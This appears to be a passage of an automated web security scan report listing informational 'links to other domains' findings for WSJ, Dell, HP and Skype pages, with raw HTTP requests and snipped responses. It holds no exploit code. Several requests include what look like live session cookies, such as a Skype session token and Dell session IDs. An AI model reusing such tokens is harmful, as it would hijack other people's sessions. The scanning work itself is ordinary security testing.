...[SNIP]...
<li class="hat_dd_item">
                       <a href="http://www.efinancialnews.com/">Financial News</a>
...[SNIP]...
<li class="hat_dd_item">
                       <a href="http://www.wsjradio.com">WSJ Radio</a>
...[SNIP]...
<li class="hat_dd_item">
                       <a href="http://www.wsjwine.com/">WSJ Wine</a>
...[SNIP]...
your personal, non-commercial use only. To order presentation-ready copies for distribution to your colleagues, clients or customers, use the Order Reprints tool at the bottom of any article or visit
<a class="firstLink" href="http://www.djreprints.com" target="_blank">www.djreprints.com</a>
...[SNIP]...
</iframe-->
<script src="http://platform.twitter.com/widgets.js" type="text/javascript"></script>

<iframe scrolling="no" frameborder="0" style="width:100px; height:21px;" count="horizontal" allowtransparency="true" src="http://platform.twitter.com/widgets/tweet_button.html?text=Houlihan Lokey Taps Weimin Chen for China Operation&url=http://on.wsj.com/qLZJgy&via=WSJ&counturl=http://online.wsj.com/article/SB10001424053111904900904576549933849920392.html"></iframe>
...[SNIP]...
<p><a href="http://www.djreprints.com">www.djreprints.com</a>
...[SNIP]...
<li class="stList-i stI-tw">
           <iframe scrolling="no" frameborder="0" style="width:100px; height:21px;" count="horizontal" allowtransparency="true" src="http://platform.twitter.com/widgets/tweet_button.html?text=Houlihan Lokey Taps Weimin Chen for China Operation&url=http://on.wsj.com/o3WVlt&via=WSJ&counturl=http://online.wsj.com/article/SB10001424053111904900904576549933849920392.html"></iframe>
...[SNIP]...
</script>
<script type="text/javascript" src="http://adsyndication.msn.com/delivery/getads.js">
</script>
...[SNIP]...
<h2><a rel="nofollow" class="yahoo" target="_blank" href="http://finance.yahoo.com" title="[Back to Yahoo! Finance]">Back To </a>
...[SNIP]...
<h2><a style="font-weight:bold" rel="nofollow" class="valor" href="http://www.valor.com.br" title="Voltar ao Valor">Voltar ao </a>
...[SNIP]...
<li><a rel="nofollow" class="msn" target="_blank" href="http://moneycentral.msn.com/" title="[Back to MSN Money]"></a></li>
   <li><h2><a rel="nofollow" target="_blank" href="http://moneycentral.msn.com/">MSN Money Homepage</a>
...[SNIP]...
<h2><a rel="nofollow" target="_blank" href="http://moneycentral.msn.com/investor/home.asp">MSN Money Investing</a>
...[SNIP]...
<div id="ctl00_pnlStyle">
   
<link rel="stylesheet" type="text/css" href="http://www.fins.com/Finance/css/FINS_Widget.css"/>

</div>

<div id="ctl00_pnlScript">
   
<script language="javascript" type="text/javascript" src="http://www.fins.com/Finance/JScripts/FINS_Widget.js"></script>
...[SNIP]...
<div class="FINSW_header">
<a id="ctl00_DefaultContent_UCJobsWidget_lnkHeaderTitle" class="finance" href="http://www.fins.com/Finance/?reflink=djm_modulewsj_widgetjobs_wsjibusinessa" target="_blank">Finance &amp; Accounting Jobs</a>

<a class="postJobBtn" href="http://recruiter.fins.com/?reflink=djm_modulewsj_widgetjobs_postwsjibusinessa" target="_blank">POST A JOB</a>
<a class="FINSW_finsLogo logo1" href="http://www.fins.com/?reflink=djm_modulewsj_widgetjobs_wsjibusinessa" target="_blank"><span>
...[SNIP]...
<li><a target="_blank" href='http://asia-jobs.fins.com/Jobs/121346/Equities-Risk-C-Developer?reflink=djm_modulewsj_widgetjobs_jobswsjibusinessa'>
Equities Risk C# Developer - <span class="company">
...[SNIP]...
<li><a target="_blank" href='http://www.fins.com/Finance/Jobs/115914/Financial-Advisor-Edward-Jones-seeks-former-finance-management-and-sales-professionals?reflink=djm_modulewsj_widgetjobs_jobswsjibusinessa'>
Financial Advisor - Edward Jones seeks former finance, management and sales professionals - <span class="company">
...[SNIP]...
<li><a target="_blank" href='http://it-jobs.fins.com/Jobs/134486/Sales-Executive?reflink=djm_modulewsj_widgetjobs_jobswsjibusinessa'>
Sales Executive - <span class="company">
...[SNIP]...
<li><a target="_blank" href='http://it-jobs.fins.com/Jobs/132889/Central-Michigan-University-ERS-Consultant-Business-Risk-Full-time-Fall-2012?reflink=djm_modulewsj_widgetjobs_jobswsjibusinessa'>
Central Michigan University - ERS Consultant, Business Risk (Full-time Fall 2012) - <span class="company">
...[SNIP]...
<li><a target="_blank" href="http://it-jobs.fins.com/?reflink=djm_modulewsj_widgetjobs_wsjibusinessa">Technology Jobs</a>
...[SNIP]...
<li><a target="_blank" href="http://it-jobs.fins.com/?reflink=djm_modulewsj_widgetjobs_wsjibusinessa">IT Jobs</a>
...[SNIP]...
<li><a target="_blank" href="http://sales-jobs.fins.com/?reflink=djm_modulewsj_widgetjobs_wsjibusinessa">Sales Jobs</a>
...[SNIP]...
<li><a target="_blank" href="http://sales-jobs.fins.com/?reflink=djm_modulewsj_widgetjobs_wsjibusinessa">Marketing Jobs</a>
...[SNIP]...
<div class="FINSW_employers"><a target="_blank" href="http://recruiter.fins.com/?reflink=djm_modulewsj_widgetjobs_wsjibusinessa">FINS for Employers &amp; Recruiters &raquo;</a><a class="postJobBtn" href="http://recruiter.fins.com/?reflink=djm_modulewsj_widgetjobs_postwsjibusinessa" target="_blank">POST A JOB</a>
...[SNIP]...
<div style="display:none"><a class="FINSW_earnMore" target="_blank" href='http://www.fins.com/Finance/Sector/FinancialAdvisor.aspx?reflink=djm_modulewsj_widgetjobs_SFwsjibusinessa'>EARN MORE. Learn how to be a Financial Advisor &raquo;</a>
...[SNIP]...
</div>
<a rel="entry-content" href="http://ie8.smoothfusion.com/WallStreetJournal/view.aspx">LINKS TO ACTUAL PAGE CONTAINING WEB SLICE FUNCTIONALITY.</a>
<a rel="bookmark" target="_blank" href="http://www.wallstreetjournal.com" ></a>
...[SNIP]...
<li><a rel="nofollow" href="http://www.djreprints.com/?mod=WSJ_footer">Reprints</a>
...[SNIP]...
<li><a rel="nofollow" href="http://www.wsjdigital.com/?mod=WSJ_footer">Advertising</a>
...[SNIP]...
<li><a href="http://www.wsjlocal.com/?mod=WSJ_footer" rel="nofollow">Advertise Locally</a>
...[SNIP]...
<li><a rel="nofollow" href="http://www.dj.com/?mod=WSJ_footer">About Dow Jones</a>
...[SNIP]...
<li><a href="http://www.dowjones.com/careers.asp?mod=WSJ_footer" rel="nofollow">Jobs at WSJ.com</a>
...[SNIP]...
<li id="futureLeadProgLink" style="display:none;"><a href="http://www.wsj-asia.com/flp/about.html?mod=WSJ_footer" rel="nofollow">Future Leadership Program</a>
...[SNIP]...
<li><a href="https://www.wsjsafehouse.com/">SafeHouse - Send Us Information</a>
...[SNIP]...
<li><a class="icon_facebook" href="http://www.facebook.com/wsj" target="_blank">WSJ on Facebook</a>
...[SNIP]...
<li><a href="http://wsj.iamplify.com/?mod=WSJ_footer">WSJ Digital Downloads</a>
...[SNIP]...
<li><a href="http://www.marketwatch.com/?siteid=wsj&dist=freedjsiteslink&mod=WSJ_footer">Marketwatch.com</a>
...[SNIP]...
<li><a href="http://online.barrons.com/public/main?mod=WSJ_footer">Barrons.com</a>
...[SNIP]...
<li><a href="http://www.smartmoney.com/?mod=WSJ_footer">SmartMoney.com</a>
...[SNIP]...
<li><a href="http://allthingsd.com/?reflink=DNH_EUR&mod=WSJ_footer">AllThingsD.com</a>
...[SNIP]...
<li class="fins"><a href="http://www.fins.com/?mod=WSJ_footer">FINS:</a> <a href="http://www.fins.com/finance/?mod=WSJ_footer">Finance,</a> <a href="http://it-jobs.fins.com/?mod=WSJ_footer">IT jobs,</a> <a href="http://sales-jobs.fins.com/?mod=WSJ_footer">Sales jobs</a>
...[SNIP]...
<li><a href="http://bigcharts.marketwatch.com/?mod=WSJ_footer">BigCharts.com</a>
...[SNIP]...
<li><a href="http://vse.marketwatch.com/Game/Homepage.aspx?mod=WSJ_footer">Virtual Stock Exchange</a>
...[SNIP]...
<li><a rel="nofollow" href="http://wsjradio.com?mod=WSJ_footer">WSJ Radio</a>
...[SNIP]...
<small class="acapLogo"><a href="http://the-acap.org/acap-enabled.php?mod=WSJ_footer" target="_blank"><span>
...[SNIP]...
</script>
<script type="text/javascript" src="http://stags.peer39.net/712/trg_712.js"></script>
<script type="text/javascript" src="http://platform.linkedin.com/in.js"></script>
...[SNIP]...

17.59. http://s1.lqcdn.com/m.min.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://s1.lqcdn.com
Path:   /m.min.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /m.min.js?dt=2.3.110104.1 HTTP/1.1
Host: s1.lqcdn.com
Proxy-Connection: keep-alive
Referer: http://www.w3schools.com/banners/aspallframe.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
x-amz-id-2: qTH3OfFD2HT+v40z5qEF/QeVL5KkA8shkvZgYVVtzHMW0VDCQHMkAFLeh7n/ld/a
x-amz-request-id: D7F3884817AD6EE9
Date: Fri, 22 Jul 2011 14:09:22 GMT
x-amz-meta-cb-modifiedtime: Fri, 22 Jul 2011 13:53:31 GMT
Last-Modified: Fri, 22 Jul 2011 13:57:35 GMT
ETag: "85e6a162e87458b7a7e3fddc815a77b2"
Accept-Ranges: bytes
Content-Type: application/x-javascript
Content-Length: 17830
Server: AmazonS3
Age: 37327
X-Cache: Hit from cloudfront
X-Amz-Cf-Id: 4721b2c2541305a5abe816e268750610f7a7f93babd7ffb49462d113c7a257558b9c81bc01f54218
Via: 1.0 95b17deadcb6eb61302c26e3cdac6107.cloudfront.net:11180 (CloudFront), 1.0 415dc6f864ab0f88c92436e56f4ceea6.cloudfront.net:11180 (CloudFront)
Connection: keep-alive

if(LqmAds===undefined){var LqmAds={GetQueryTerms:function(){var d=[{d:"www.google.",q:"q="},{d:"www.bing.com",q:"q="},{d:"search.live.com",q:"q="},{d:"search.yahoo.com",q:"p="},{d:"codeproject.com",q:
...[SNIP]...
</iframe>';return this.ReplacePlaceholders(b,a)},BuildJavaScriptTag:function(a){var b='<script language="JavaScript" src="http://ad.doubleclick.net/adj/{sitename}/{zonename};{searchterm}sz={format};{type}tile={tile};ord={timestamp}?" type="text/javascript"></script>
...[SNIP]...

17.60. http://search.dell.com/results.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://search.dell.com
Path:   /results.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /results.aspx?s=bsd&c=us&l=en&cs=04&k=xss&cat=all HTTP/1.1
Host: search.dell.com
Proxy-Connection: keep-alive
Referer: http://content.dell.com/us/en/business/security-network.aspx?st=application%20security%20web&dgc=ST&cid=64824&lid=1652027&acd=s1CStlI5S,13885348293,901qz26673
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SITESERVER=ID=6aa205d057b942709557cad53be901a1; SITESERVER_SESSION=ID=6aa205d057b942709557cad53be901a1; lwp=c=us&l=en&s=bsd&cs=04; mbox=check#true#1315153211|session#1315153150925-582363#1315155011|PC#1315153150925-582363.19#1316362754; s_cc=true; s_c49=c%3Dus%26l%3Den%26s%3Dbsd%26cs%3D04; gpv_pn=us%3Aen%3Absd%3A04%3Acategory%3Asecurity-network; e21=us-bsd%3A1317745155344; s_depth=1; sessionTime=Sun%20Sep%2004%202011%2011%3A19%3A15%20GMT-0500%20(Central%20Daylight%20Time); s_sq=%5B%5BB%5D%5D; s_sv_sid=985310046244; s_sv_112_p1=1@105@s/6782/6781/6780/6779/6757/6705/6704/6703/6702/6701/6700/6651/6650/6647/6638/6569/6561/6514/6566/6565&e/2; s_sv_112_s1=1@16@a//1315153156068; s_vi=[CS]v1|2731D26F05011FEE-4000010DE01961E7[CE]; bn_u=7520365768526576457; s_ppv=us%253Aen%253Absd%253A04%253Acategory%253Asecurity-network%2C41%2C41%2C910; bn_condition=us%7Cbsd%7Cd; cid=64824; lid=1652027; dgc=st; st=application%20security%20web; acd=s1cstli5s%2C13885348293%2C901qz26673; s_dl=1; s_channelstack=%5B%5B'st'%2C'1315153155412'%5D%2C%5B'st'%2C'1315153231779'%5D%5D; s_hwp=04%7C%7Cnull%7C%7C4%3A9%3A2011%3A11%3A20%7C%7CN%7C%7CN%7C%7Cnull%7C%7CNaN%7C%7Cnull%7C%7Cst%7C%7CN%7C%7Cnull%7C%7Cnull%7C%7Cnull

Response

HTTP/1.1 200 OK
Cache-Control: private,max-age=0
Date: Sun, 04 Sep 2011 16:19:59 GMT
Content-Type: text/html; charset=utf-8
Expires: Wed, 01 Jan 1997 12:00:00 GMT
Server: Microsoft-IIS/6.0
X-UA-Compatible: IE=7
P3P: policyref="http://www.dell.com/w3c/p3p.xml", CP="BUS CAO CNT COM CUR DEV DSP INT NAV OUR PSA PSD SAM STA TAI UNI"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: search_bn=us|bsd|SearchBaynoteEnabled.1; domain=.dell.com; expires=Tue, 04-Oct-2011 16:19:56 GMT; path=/
Set-Cookie: dellsearch=srchb=control&rpp=12; expires=Tue, 04-Oct-2011 16:19:56 GMT; path=/
Set-Cookie: StormSCookie=bandwidth=NA; domain=.dell.com; path=/
Vary: Accept-Encoding
Content-Length: 90930

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd">
<!-- Contents of this file are Copyright 2011, Dell Inc. -->
<html>
<head>
   <TITLE>xss -
...[SNIP]...
<span class="lnks" style="white-space:nowrap; display: block; padding-left: 6px; margin-left:12px;"><a href="http://dellcustomerstories.com/?~ck=mn">Customer Stories Solutions</a>
...[SNIP]...
<div class="footerlink"><a href="http://www.ideastorm.com/">Share Your Ideas</a>
...[SNIP]...

17.61. http://search.hp.com/query.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://search.hp.com
Path:   /query.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /query.html?lang=en&qp=&search=&qt=xss&la=en&hps=Home&hpr=http%3A//h41131.www4.hp.com/us/en&charset=utf-8&cc=us&hpn=Home&hpa=http%3A//www.hp.com/country/us/en/contact_us.html HTTP/1.1
Host: search.hp.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Server: Ultraseek/5.7.6
Cache-control: public
Expires: Sun, 11 Sep 2011 16:19:41 GMT
Date: Sun, 04 Sep 2011 16:19:41 GMT
Content-type: text/html; charset=utf-8
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-us">
<head>
<title>Search HP US - Search results for 'xss'</title>
<link rel="sh
...[SNIP]...
</script>
<script type="text/javascript" language="JavaScript" src="http://welcome.hp-ww.com/country/us/en/js/hpweb_utilities.js"></script>
...[SNIP]...
<a href="#jumptocontent"><img src="http://welcome.hp-ww.com/img/s.gif" width="10" height="1" alt="Jump to content" border="0"></a>
...[SNIP]...
<td><img src="http://welcome.hp-ww.com/img/s.gif" width="10" height="24" alt="" border="0"></td>
...[SNIP]...
<td><img src="http://welcome.hp-ww.com/img/s.gif" width="20" height="1" alt=""></td>
...[SNIP]...
<a href="http://welcome.hp.com/country/us/en/welcome.html" onClick='s_linkType="o";s_linkName="NAV click-through: US EN";s_lnk=s_co(this);s_gs("hphqsearch")'><img src="http://welcome.hp-ww.com/country/us/en/img/top/hpweb_1-2_topnav_home.gif" width="100" height="24" border="0" alt="HP.com Home"></a></td>
<td class="colorE7E7E7bg"><img src="http://welcome.hp-ww.com/img/s.gif" width="1" height="1" alt=""></td>
<td><a href="http://welcome.hp.com/country/us/en/prodserv.html" onClick='s_linkType="o";s_linkName="NAV click-through: US EN";s_lnk=s_co(this);s_gs("hphqsearch")'><img src="http://welcome.hp-ww.com/country/us/en/img/top/hpweb_1-2_topnav_prdsrv.gif" width="166" height="24" border="0" alt="Products and Services"></a></td>
<td class="colorE7E7E7bg"><img src="http://welcome.hp-ww.com/img/s.gif" width="1" height="1" alt=""></td>
<td><a href="http://welcome.hp.com/country/us/en/support.html" onClick='s_linkType="o";s_linkName="NAV click-through: US EN";s_lnk=s_co(this);s_gs("hphqsearch")'><img src="http://welcome.hp-ww.com/country/us/en/img/top/hpweb_1-2_topnav_supprt.gif" width="163" height="24" border="0" alt="Support and Drivers"></a></td>
<td class="colorE7E7E7bg"><img src="http://welcome.hp-ww.com/img/s.gif" width="1" height="1" alt=""></td>
<td><a href="http://welcome.hp.com/country/us/en/solutions.html" onClick='s_linkType="o";s_linkName="NAV click-through: US EN";s_lnk=s_co(this);s_gs("hphqsearch")'><img src="http://welcome.hp-ww.com/country/us/en/img/top/hpweb_1-2_topnav_slutns.gif" width="143" height="24" border="0" alt="Solutions"></a></td>
<td class="colorE7E7E7bg"><img src="http://welcome.hp-ww.com/img/s.gif" width="1" height="1" alt=""></td>
<td><a href="http://welcome.hp.com/country/us/en/howtobuy.html" onClick='s_linkType="o";s_linkName="NAV click-through: US EN";s_lnk=s_co(this);s_gs("hphqsearch")'><img src="http://welcome.hp-ww.com/country/us/en/img/top/hpweb_1-2_topnav_buy.gif" width="143" height="24" border="0" alt="How to Buy"></a></td>
<td class="colorE7E7E7bg"><img src="http://welcome.hp-ww.com/img/s.gif" width="1" height="1" alt=""></td>
...[SNIP]...
<td width="20" valign="top"><img src="http://welcome.hp-ww.com/img/s.gif" width="20" height="48" alt="" class="decoration"></td>
...[SNIP]...
<td colspan="4"><img src="http://welcome.hp-ww.com/img/s.gif" width="1" height="2" alt="" border="0"></td>
...[SNIP]...
<input type="text" name="qt" size="26" value="xss" maxlength="100" id="textbox1" alt="Enter search criteria here">


<img src="http://welcome.hp-ww.com/img/s.gif" width="3" height="1" alt=""><a id="submitsearch" onmouseover="status='Search using the specified criteria';return true;" onmouseout="status='';return true;" onFocus="status='Search using the specified criteria';return true;" onBl
...[SNIP]...
<td align="left"><img src="http://welcome.hp-ww.com/img/s.gif" width="20" height="1" alt="" class="decoration"></td>
</tr>
<tr>
<td><img src="http://welcome.hp-ww.com/img/s.gif" alt="" class="decoration"></td>
...[SNIP]...
<a href="http://welcome.hp.com/country/us/en/welcome.html" onClick='s_linkType="o";s_linkName="NAV click-through: US EN";s_lnk=s_co(this);s_gs("hphqsearch")'><img src="http://welcome.hp-ww.com/img/hpweb_1-2_topnav_hp_logo.gif" width="64" height="55" alt="HP.com home" border="0"></a><br></td>
<td width="10"><img src="http://welcome.hp-ww.com/img/s.gif" width="10" height="93" alt=""></td>
...[SNIP]...
<td align="left"><img src="http://welcome.hp-ww.com/img/s.gif" height="20" alt=""></td>
...[SNIP]...
<td align="left" width="10"><img src="http://welcome.hp-ww.com/img/s.gif" width="10" height="1" alt=""></td>
...[SNIP]...
<td align="left" valign="top" width="10"><img src="http://welcome.hp-ww.com/img/s.gif" width="10" height="1" alt=""></td>
...[SNIP]...
<td align="left" width="10"><img src="http://welcome.hp-ww.com/img/s.gif" width="10" height="10" alt=""></td>
<td align="left" width="10"><img src="http://welcome.hp-ww.com/img/s.gif" width="10" height="10" alt=""></td>
<td align="left" width="10"><img src="http://welcome.hp-ww.com/img/s.gif" width="10" height="10" alt=""></td>
<td align="left" width="120"><img src="http://welcome.hp-ww.com/img/s.gif" width="120" height="10" alt=""></td>
...[SNIP]...
<td align="left" width="150" colspan="4"><img src="http://welcome.hp-ww.com/img/s.gif" width="150" height="10" alt=""></td>
...[SNIP]...
<td align="left" width="10"><img src="http://welcome.hp-ww.com/img/s.gif" width="10" height="1" alt=""></td>
<td align="left" valign="top" width="140" class="colorCCCCCCbg" colspan="3"><img src="http://welcome.hp-ww.com/img/s.gif" width="140" height="1" alt=""></td>
...[SNIP]...
<td align="left" width="150" colspan="4"><img src="http://welcome.hp-ww.com/img/s.gif" width="150" height="10" alt=""></td>
...[SNIP]...
<td align="left" width="150" colspan="4"><img src="http://welcome.hp-ww.com/img/s.gif" width="150" height="10" alt=""></td>
...[SNIP]...
<td align="left" valign="top" width="10"><img src="http://welcome.hp-ww.com/img/s.gif" width="10" height="1" alt=""></td>
...[SNIP]...
<td colspan="3" class="colorCCCCCCbg"><img src="http://welcome.hp-ww.com/img/s.gif" width="1" height="2" alt="" border="0"></td>
...[SNIP]...
<a name="jumptocontent"><img src="http://welcome.hp-ww.com/img/s.gif" width="10" height="1" alt="Content starts here"></a>
...[SNIP]...
<td align="left" valign="top" width="560" class="colorCCCCCCbg"><img src="http://welcome.hp-ww.com/img/s.gif" width="560" height="1" alt=""></td>
...[SNIP]...
<td align="left" width="560"><img src="http://welcome.hp-ww.com/img/s.gif" width="560" height="10" alt=""></td>
...[SNIP]...
<td width="100%"><img src="http://welcome.hp-ww.com/img/s.gif" width="100%" height="4" alt=""></td>
...[SNIP]...
<td width="10" valign="top"><img src="http://welcome.hp-ww.com/img/s.gif" width="1" height="1" alt="" class="decoration"></td>
...[SNIP]...
<td width="10" valign="top"><img src="http://welcome.hp-ww.com/img/s.gif" width="1" height="1" alt="" class="decoration"></td>
...[SNIP]...
<td width="10" valign="top"><img src="http://welcome.hp-ww.com/img/s.gif" width="1" height="1" alt="" class="decoration"></td>
...[SNIP]...
<td width="10" valign="top"><img src="http://welcome.hp-ww.com/img/s.gif" width="1" height="1" alt="" class="decoration"></td>
...[SNIP]...
<td width="10" valign="top"><img src="http://welcome.hp-ww.com/img/s.gif" width="1" height="1" alt="" class="decoration"></td>
...[SNIP]...
<td width="10" valign="top"><img src="http://welcome.hp-ww.com/img/s.gif" width="1" height="1" alt="" class="decoration"></td>
...[SNIP]...
<td width="10" valign="top"><img src="http://welcome.hp-ww.com/img/s.gif" width="1" height="1" alt="" class="decoration"></td>
...[SNIP]...
<td width="10" valign="top"><img src="http://welcome.hp-ww.com/img/s.gif" width="1" height="1" alt="" class="decoration"></td>
...[SNIP]...
<td width="10" valign="top"><img src="http://welcome.hp-ww.com/img/s.gif" width="1" height="1" alt="" class="decoration"></td>
...[SNIP]...
<td width="10" valign="top"><img src="http://welcome.hp-ww.com/img/s.gif" width="1" height="1" alt="" class="decoration"></td>
...[SNIP]...
<td colspan="3"><img src="http://welcome.hp-ww.com/img/s.gif" width="1" height="10" alt=""></td>
...[SNIP]...
<td align="left" valign="top" class="colorCCCCCCbg" colspan="3"><img src="http://welcome.hp-ww.com/img/s.gif" height="1" alt=""></td>
...[SNIP]...
<td align="left" colspan="3"><img src="http://welcome.hp-ww.com/img/s.gif" height="10" alt=""></td>
</tr>

<tr>

<td width="30" align="left" class="decoration"><img src="http://welcome.hp-ww.com/img/s.gif" width="30" height="1" alt=""></td>
...[SNIP]...
<td align="left" colspan="3"><img src="http://welcome.hp-ww.com/img/s.gif" height="10" alt=""></td>
...[SNIP]...
<td align="left" valign="top" class="colorCCCCCCbg" colspan="3"><img src="http://welcome.hp-ww.com/img/s.gif" height="1" alt=""></td>
...[SNIP]...
<td class="theme" colspan="6"><img src="http://welcome.hp-ww.com/img/s.gif" width="1" height="4" alt=""></td>
...[SNIP]...
<td colspan="6"><img src="http://welcome.hp-ww.com/img/s.gif" width="1" height="10" alt="" class="decoration"></td>
...[SNIP]...
<input type=hidden name=st value="1">

<img src="http://welcome.hp-ww.com/img/s.gif" width="10" height="1" alt="" class="decoration"></td>
<td><img src="http://welcome.hp-ww.com/img/s.gif" width="1" height="10" alt="" class="decoration"></td>

<td><img src="http://welcome.hp-ww.com/img/s.gif" width="1" height="10" alt="" class="decoration"></td>
...[SNIP]...
<td align="left" width="10" class="colorE7E7E7bg"><img src="http://welcome.hp-ww.com/img/s.gif" width="10" height="1" alt=""></td>
...[SNIP]...
<td valign="middle" class="colorE7E7E7bg"><img src="http://welcome.hp-ww.com/img/s.gif" width="4" height="1" alt="" class="decoration"></td>
...[SNIP]...
<td class="colorE7E7E7bg"><img src="http://welcome.hp-ww.com/img/s.gif" width="4" height="1" alt=""></td><td class="colorE7E7E7bg"><img src="http://welcome.hp-ww.com/img/s.gif" alt=""></td>
...[SNIP]...
<td valign="top" width="5" class="colorE7E7E7bg" nowrap><img src="http://welcome.hp-ww.com/img/s.gif" height="1" alt=""></td>
...[SNIP]...
<td colspan="6"><img src="http://welcome.hp-ww.com/img/s.gif" width="1" height="10" alt="" class="decoration"></td>
...[SNIP]...
<td colspan="6"><img src="http://welcome.hp-ww.com/img/s.gif" width="1" height="10" alt="" class="decoration"></td>
...[SNIP]...
<td align="center" valign="bottom" width="170" bgcolor="#F0F0F0"><img src="http://welcome.hp-ww.com/img/hpweb_1-2_prnt_icn.gif" width="19" height="13" alt="" border="0"><a href="/query.html?charset=iso-8859-1&amp;lk=1&amp;la=en&amp;nh=10&amp;st=1&amp;rf=0&amp;qs=&amp;qt=xss&amp;tridion=0&amp;hpvc=sitewide&amp;uf=1&amp;pv=1" class="udrlinebold">
...[SNIP]...
<td width="560"><img src="http://welcome.hp-ww.com/img/s.gif" width="1" height="60" alt="" border="0" ></td>
</tr>
<tr>
<td align="center" valign="bottom" width="170" bgcolor="#F0F0F0"><img src="http://welcome.hp-ww.com/img/s.gif" width="1" height="1" alt="" border="0"></td>
...[SNIP]...
<td width="560"><img src="http://welcome.hp-ww.com/img/s.gif" width="1" height="20" alt="" border="0"></td>
...[SNIP]...
<td class="color666666bg"><img src="http://welcome.hp-ww.com/img/s.gif" width="1" height="4" alt="" border="0"></td>
...[SNIP]...
<td colspan="4"><img src="http://welcome.hp-ww.com/img/s.gif" width="1" height="4" alt="" border="0"></td>
...[SNIP]...
<td colspan="4"><img src="http://welcome.hp-ww.com/img/s.gif" width="1" height="4" alt=""></td>
...[SNIP]...
</script>

<script src="http://welcome.hp-ww.com/cma/segment/ww/search/metricsSearch.js" type="text/javascript" language="JavaScript"></script>
...[SNIP]...
</script>
<script src="http://welcome.hp-ww.com/cma/segment/ww/search/metricsSearch.js" type="text/javascript" language="JavaScript"></script>
...[SNIP]...

17.62. http://search2.skype.com/search/search.cgi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://search2.skype.com
Path:   /search/search.cgi

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /search/search.cgi?query=xss&collection=skype-en HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: search2.skype.com
Cookie: skype-session-token=94fd441852b9e1046c98536f973599d688791fc3; SC=CC=:CCY=:LC=en-us:LIM=:TM=1314118976:TS=1314118390:TZ=:VAT=:VER=0/5.5.0.114/0

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 18:16:25 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 39997

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<!-- Meta -->
<meta cha
...[SNIP]...
<!-- stylesheets -->
<link rel="stylesheet" href="http://www.skypeassets.com/i/css/turbo/full.css" type="text/css" media="screen">
<script type="text/javascript">
...[SNIP]...

17.63. https://secure.skype.com/login  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.skype.com
Path:   /login

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /login?partner_id=b38bf07d4373f92f5932f9e2887a32e0&return_url=http%3A%2F%2Fcommunity.skype.com%2Ft5%2FEnglish%2Fct-p%2FEnglish%3Fprofile.language%3Den HTTP/1.1
Host: secure.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 04 Sep 2011 21:30:28 GMT
Content-Type: text/html
Connection: keep-alive
Set-Cookie: SC=CC=:CCY=:LC=en:LIM=:TM=1315171828:TS=1314118390:TZ=:VAT=:VER=; expires=Mon, 03-Sep-2012 21:30:28 GMT; path=/; domain=.login.ab-testing
X-Stratus-Processing-Time: 0.0469
Set-Cookie: version=ad0dcdedf8; path=/
Vary: User-Agent,Accept-Encoding
Content-Length: 4656

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"
...[SNIP]...
</title>

<link rel="icon" type="image/vnd.microsoft.icon" href="https://apps.skypeassets.com/static/skype-account/images/icons/favicon.ico"/>
<link rel="shortcut icon" href="https://apps.skypeassets.com/static/skype-account/images/icons/favicon.ico"/>
<link rel="apple-touch-icon" href="https://apps.skypeassets.com/static/skype-account/images/logos/skype_webclip.png"/>

<link rel="stylesheet" type="text/css" media="screen" href="https://apps.skypeassets.com/static/skype-account/css/reset.css;base.css;grid.css;wbr-content.css;flags.css;buttons-simple.css;navigation.css"/>


</head>
...[SNIP]...
